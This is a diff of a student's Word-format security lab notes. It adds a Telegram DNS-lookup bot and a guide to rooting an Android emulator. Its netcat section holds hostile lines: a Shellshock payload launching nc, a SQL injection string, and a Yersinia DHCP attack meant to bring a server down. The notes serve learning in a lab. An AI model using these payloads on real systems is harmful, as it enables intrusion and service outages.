+        <w:t>1:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>import sys</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t># Remove every cached telegram-related module from this running process</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>for mod in list(sys.modules):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    if mod == "telegram" or mod.startswith("telegram."):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        del sys.modules[mod]</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>!rm -rf /usr/local/lib/python3.12/dist-packages/telegram*</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>!pip install --no-cache-dir --force-reinstall "python-telegram-bot==22.8"</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>import importlib</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>import telegram</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>importlib.reload(telegram)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>print(telegram.__version__)</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>`````````</w:t>
+      </w:r>
+      <w:r>
+        <w:t>``````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>2:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>```````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>!pip install --no-cache-dir --force-reinstall "APScheduler==3.10.4"</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>import importlib</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>import apscheduler</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>importlib.reload(apscheduler)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>print(apscheduler.__version__)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>```````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>3:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>```````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>%%writefile recon_bot.py</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>import re</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>import asyncio</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>from telegram import Update</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>from telegram.ext import Application, CommandHandler, MessageHandler, ContextTypes, filters</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>BOT_TOKEN = "TOKEN"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>HOSTNAME_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?&lt;!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?&lt;!-))*$")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>async def start(update: Update, context: ContextTypes.DEFAULT_TYPE):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    await update.message.reply_text("Welcome {}".format(update.effective_user.first_name))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>async def message_handler(update: Update, context: ContextTypes.DEFAULT_TYPE):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    target = update.message.text.strip()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    if not HOSTNAME_RE.match(target):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        await update.message.reply_text("Invalid hostname/IP.")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        return</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    try:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        # Replaces subprocess.run non-blockingly with a 10 second timeout</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">        proc = await asyncio.wait_for(</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            asyncio.create_subprocess_exec(</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">                "host", "-t", "a", target,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">                stdout=asyncio.subprocess.PIPE,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">                stderr=asyncio.subprocess.PIPE</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            ),</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            timeout=10.0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        )</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        # Non-blocking wait for stdout data</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        stdout, _ = await proc.communicate()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        out = stdout.decode().strip()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        await update.message.reply_text(out[:3500] or "(no output)")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    except asyncio.TimeoutError:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        await update.message.reply_text("Error: Command timed out after 10 seconds.")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    except Exception as e:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        await update.message.reply_text(f"An unexpected error occurred: {str(e)}")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>if __name__ == '__main__':</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    app = Application.builder().token(BOT_TOKEN).build()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    app.add_handler(CommandHandler("start", start))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    app.add_handler(MessageHandler(filters.TEXT &amp; ~filters.COMMAND, message_handler))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    app.run_polling()</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> ```````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>4:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>``````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">!python3 recon_bot.py </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>----- OR --------</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>!nohup python3 recon_bot.py &gt; bot.log 2&gt;&amp;1 &amp;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>``````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
     <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>

--- a/1.nmap.docx
+++ b/1.nmap.docx
@@ -2800,15 +2800,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Syntax: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> [options] host port</w:t>
+        <w:t>Syntax: nc [options] host port</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2836,21 +2828,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc -</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2884,21 +2867,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> machine1_IP 8080 -v</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc machine1_IP 8080 -v</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2921,21 +2895,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc -</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2969,21 +2934,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 127.0.0.1 8080 -v &gt; send.txt</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc 127.0.0.1 8080 -v &gt; send.txt</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -3006,21 +2962,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n -v -</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc -n -v -</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3048,21 +2995,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc -</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3166,23 +3104,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>; }; echo; /bin/bash -c "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
+        <w:t>; }; echo; /bin/bash -c "nc -</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3237,21 +3159,12 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.46.234 65000 -v</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc 192.168.46.234 65000 -v</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7630,21 +7543,12 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc -</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -8563,19 +8467,16 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>So</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t xml:space="preserve">So </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>lets</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> Inject ' or ''=' into the Query:</w:t>
       </w:r>
@@ -24364,21 +24265,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> vi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>m</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /etc/</w:t>
+        <w:t xml:space="preserve"> vim /etc/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -24706,149 +24593,465 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:t xml:space="preserve"> –reload</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>journalctl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -u </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>dhcpd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">           </w:t>
+      </w:r>
+      <w:r>
+        <w:t>&lt;-- check logs with this</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>configure yersinia on kali:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>----------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Sudo apt install yersinia</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Sudo yersinia </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>dhcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -attack </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>--- start attack</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Now it targets </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dhcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> server do it down.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+      <w:r>
+        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>SOME NOTES IN NOTEBOOK</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
-        </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>reload</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>journalctl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -u </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>dhcpd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -f</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">           </w:t>
-      </w:r>
-      <w:r>
-        <w:t>&lt;-- check logs with this</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>configure yersinia on kali:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>----------------------------------</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Sudo apt install yersinia</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Sudo yersinia </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>dhcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -attack </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>--- start attack</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Now it targets </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dhcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> server do it down.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>TRYING TO ROOT MOBILE PHONE:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>By default, the adb.exe file for Android Studio on Windows is located at:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>C:\Users\&lt;Your-Username&gt;\AppData\Local\Android\Sdk\platform-tools\</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>You can easily copy and paste %LOCALAPPDATA%\Android\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Sdk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\platform-tools into your Windows File Explorer address bar to jump straight to the folder.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-----------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Step-by-Step Guide to Root an AVD with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>rootAVD</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>1. Set up Android Studio and AVD:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- Install Android Studio.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- Open Device Manager (Tools → Device Manager) and create/start an AVD (preferably x86_64 with Google Play Store APIs).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">- Ensure Android SDK Platform-Tools (for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>adb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) is installed via SDK Manager.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">2. Download </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>rootAVD</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>git clone https://gitlab.com/newbit/rootAVD.git</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">cd </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>rootAVD</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>3. List available AVD images:</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">./rootAVD.sh </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ListAllAVDs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">   # Linux/macOS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t># or</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">rootAVD.bat </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ListAllAVDs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">    # Windows</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">This shows the exact path to your AVD's </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ramdisk.img</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
